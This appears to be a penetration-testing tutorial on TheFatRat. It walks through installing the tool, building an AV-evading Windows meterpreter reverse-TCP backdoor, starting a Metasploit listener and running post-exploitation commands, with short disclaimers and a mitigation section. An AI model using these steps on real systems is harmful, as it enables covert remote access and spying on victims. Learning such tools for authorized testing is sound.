TheFatRat: Generating Backdoors for Penetration Testing with Examples

 

Guide to TheFatRat: Generating Backdoors for Penetration Testing with Examples

Introduction

TheFatRat is an open-source exploitation tool designed to simplify the creation of backdoors and payloads for penetration testing and ethical hacking. Developed by Edo Maland and contributors, it automates the process of generating malware with popular payloads using MSFvenom and Metasploit, enabling testers to simulate real-world attacks. TheFatRat supports multiple operating systems (Windows, Linux, Mac, Android) and includes features like antivirus evasion, file pumping, and AutoRun file creation for USB/CDROM exploitation. It is primarily used on Linux distributions like Kali Linux for educational and authorized testing purposes.

This article provides a detailed tutorial on TheFatRat, covering its installation, key features, usage, and a practical example of creating a backdoor. Aimed at penetration testers, security researchers, and bug bounty hunters, this guide assumes basic familiarity with command-line interfaces and ethical hacking concepts. All examples are for educational purposes and must only be performed on systems you have explicit permission to test, such as lab environments or bug bounty targets. Unauthorized use of TheFatRat is illegal and unethical.

What is TheFatRat?

TheFatRat is a versatile tool that compiles payloads with popular exploits, creating backdoors that can bypass most antivirus software. It leverages MSFvenom and Metasploit to generate payloads in various formats (e.g., .exe, .apk, .php) and supports post-exploitation tasks like browser attacks and DLL injection. Originally released in 2016, TheFatRat has been updated to version 1.9.6 (as of 2019) and is hosted on GitHub (https://github.com/screetsec/TheFatRat).

Key Features

• Payload Generation: Creates backdoors for Windows, Linux, Mac, and Android in formats like .exe, .apk, .php, .bat, and .elf.
• Antivirus Evasion: Uses techniques like C language payloads, encryption, and file pumping to bypass AV detection.
• Metasploit Integration: Automates MSFvenom for payload creation and Metasploit for listener setup.
• File Pumper: Increases file size to evade detection or mimic legitimate files.
• AutoRun Creation: Generates AutoRun scripts for USB/CDROM exploitation.
• Cross-Platform Compatibility: Executes payloads on multiple operating systems.
• Network Features: Detects external IP and interface addresses.
• Ease of Use: Menu-driven interface with options for backdoor creation, listener setup, and exploitation.

Ethical Considerations

TheFatRat is intended for educational purposes and authorized penetration testing. Developers explicitly state that using it to attack systems without prior consent is illegal. Misuse can lead to severe legal consequences, and the creators assume no liability for unauthorized use.

System Requirements

• Operating System: Kali Linux (recommended), Parrot OS, Cyborg, BackTrack, or other Linux distributions.
• Dependencies: Metasploit Framework, Mono, MinGW-w64, Java, and other tools installed during setup.
• Hardware: Minimum 2GB RAM; 4GB+ recommended for complex payload generation.
• Network: Stable connection for listener setup and updates.

Installation Guide

TheFatRat is not pre-installed on Kali Linux and requires manual installation from GitHub. Below are the steps to set it up.

Installation Steps

1. Update System:

2.  sudo apt update

sudo apt install -y git

3. Clone the Repository:

4.  git clone https://github.com/screetsec/TheFatRat.git

cd TheFatRat

5. Grant Execution Permissions:

6.  chmod +x setup.sh

7.  chmod +x fatrat

chmod +x powerfull.sh

8. Run Setup Script:

./setup.sh

• The script checks and installs dependencies (e.g., Metasploit, Mono, MinGW-w64).
• If prompted about MinGW version, select No to avoid installation issues.
8. Verify Installation:

./fatrat

The main menu should appear, listing options for backdoor creation and other tasks.

Troubleshooting

• Dependency Errors: If setup fails, manually install missing tools (e.g., sudo apt install mono-complete).
• MinGW Issues: Choose “No” when prompted to update MinGW during setup to avoid version conflicts.
• Updates: Run git pull && chmod +x setup.sh && ./setup.sh in the TheFatRat directory to update.
• Check Tools: Use chk_tools script to diagnose setup issues:

./chk_tools

Using TheFatRat

TheFatRat operates through a menu-driven interface or direct script execution. Below is an overview of its main menu and key options.

Main Menu

Launch TheFatRat:

cd TheFatRat

./fatrat

Example Menu:

TheFatRat - Massive Exploiting Tool

1. Create Backdoor with msfvenom

2. Create FUD Backdoor with PwnWinds

3. Create Backdoor with PowerShell

4. File Pumper

5. Generate AutoRun for USB/CDROM

6. Backdoor with Original APK

7. Exit

Key Options

• Option 1: Create a backdoor using MSFvenom (e.g., .exe, .php).
• Option 2: Generate Fully Undetectable (FUD) backdoors with PwnWinds.
• Option 4: Increase file size to evade AV detection.
• Option 5: Create AutoRun files for USB exploitation.
• Option 6: Embed payloads in legitimate Android APKs.

Command-Line Usage

For automation, run scripts directly (less common):

./fatrat

Navigate the menu to select options and configure payloads.

Practical Example: Creating a Windows Backdoor

This example demonstrates using TheFatRat to create a Windows backdoor in a controlled lab environment (e.g., a virtual machine running Windows 10). Do not use on unauthorized systems.

Step 1: Setup

1. Prepare Environment:
• Use Kali Linux (attacker IP: 192.168.1.100).
• Set up a Windows 10 VM as the target (e.g., VirtualBox).
• Ensure Metasploit is installed: sudo service metasploit start.
2. Launch TheFatRat:

3.  cd TheFatRat

./fatrat

Step 2: Create a Backdoor

1. Select Option 1 (Create Backdoor with MSFvenom).
2. Choose target OS: Select Windows (option varies by menu).
3. Select payload: Choose windows/meterpreter/reverse_tcp (e.g., option 5).
4. Configure options:
• LHOST: 192.168.1.100 (attacker’s IP).
• LPORT: 4444 (listener port).
• Output Name: backdoor.exe.
5. Generate payload:
• TheFatRat creates backdoor.exe in /root/TheFatRat/output/.
• A Metasploit handler file (.rc) is generated for the listener.

Step 3: Set Up Metasploit Listener

1. Start Metasploit:

msfconsole -r /root/TheFatRat/output/backdoor.rc

2. Wait for the target to execute the payload.

Step 4: Deploy the Payload

1. Transfer backdoor.exe to the Windows VM (e.g., via a shared folder or phishing simulation).
2. Execute backdoor.exe on the target.
3. Metasploit receives a Meterpreter session: Example Output:

4.  [*] Started reverse TCP handler on 192.168.1.100:4444

5.  [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:54321)

6.  meterpreter > sysinfo

7.  Computer : WIN10-VM

OS       : Windows 10 (Build 19041)

Step 5: Post-Exploitation

1. Use Meterpreter commands:
• getuid: Check user privileges.
• screenshot: Capture the desktop.
• shell: Access a command prompt.
2. Example Output:

3.  meterpreter > screenshot

Screenshot saved to: /root/.msf4/screenshots/win10_2025-09-06.png

Step 6: File Pumping (Optional)

1. Increase the payload size to evade AV:
• Select Option 4 (File Pumper).
• Choose backdoor.exe.
• Set size: 10 MB.
2. Output: Updated backdoor.exe with increased size.

Visual References

TheFatRat’s interface is menu-driven with text-based output. For screenshots:

• GitHub: https://github.com/screetsec/TheFatRat (README shows the main menu and output).
• YouTube Tutorials: Search “TheFatRat tutorial” (e.g., https://www.youtube.com/watch?v=7PMfPbrM0o4 for menu walkthroughs).
• Medium Articles: Search “TheFatRat penetration testing” for visuals of payload generation and Metasploit sessions.
• Hackers Arise: https://hackers-arise.com/post/2023/12/31/thefatrat-guide for setup and execution screenshots.

Best Practices and Tips

• Legal Use: Only test systems with explicit permission. Unauthorized use is illegal and can lead to prosecution.
• Lab Environment: Use virtual machines (e.g., VirtualBox, VMware) or lab platforms like Hack The Box or TryHackMe.
• Antivirus Evasion: Test payloads on VirusTotal to verify FUD capabilities; combine with Veil for enhanced evasion (see Veil tutorial).
• Integration: Pair with Metasploit for robust exploitation; use Discover for reconnaissance or sqlmap for web vulnerabilities (see previous tutorials).
• Output Management: Check /root/TheFatRat/output/ for payloads and logs.
• Common Issues:
• Setup Failures: Run chk_tools to diagnose dependency issues.
• AV Detection: Use PwnWinds (Option 2) or file pumping for better evasion.
• Learning Resources:
• GitHub: https://github.com/screetsec/TheFatRat
• Web Security Academy: https://portswigger.net/web-security for related labs
• TryHackMe: Rooms like “Metasploit” or “Penetration Testing Basics”
• Black Hat Ethical Hacking: https://www.blackhatethicalhacking.com/news/thefatrat/

Mitigation Strategies

To protect against TheFatRat and similar tools:

• Update Systems: Patch OS vulnerabilities regularly.
• Antivirus Software: Use reputable AV (e.g., Windows Defender, Avast) with real-time protection.
• Network Security: Monitor traffic for suspicious connections (e.g., Meterpreter callbacks).
• User Awareness: Avoid executing unknown files or clicking phishing links.
• File Integrity: Verify executable integrity before running.

Conclusion

TheFatRat is a powerful tool for penetration testers, automating the creation of backdoors and payloads for authorized testing. Its integration with Metasploit, antivirus evasion capabilities, and cross-platform support make it a favorite among ethical hackers. However, its potential for misuse underscores the need for strict ethical guidelines. Practice in safe environments like Web Security Academy or Hack The Box, and always obtain permission before testing. By mastering TheFatRat, you can better understand exploitation techniques and strengthen defenses against real-world threats.

Author: Engr. M A Rshid Rony
Date: September 6, 2025
For updates, visit: https://github.com/screetsec/TheFatRat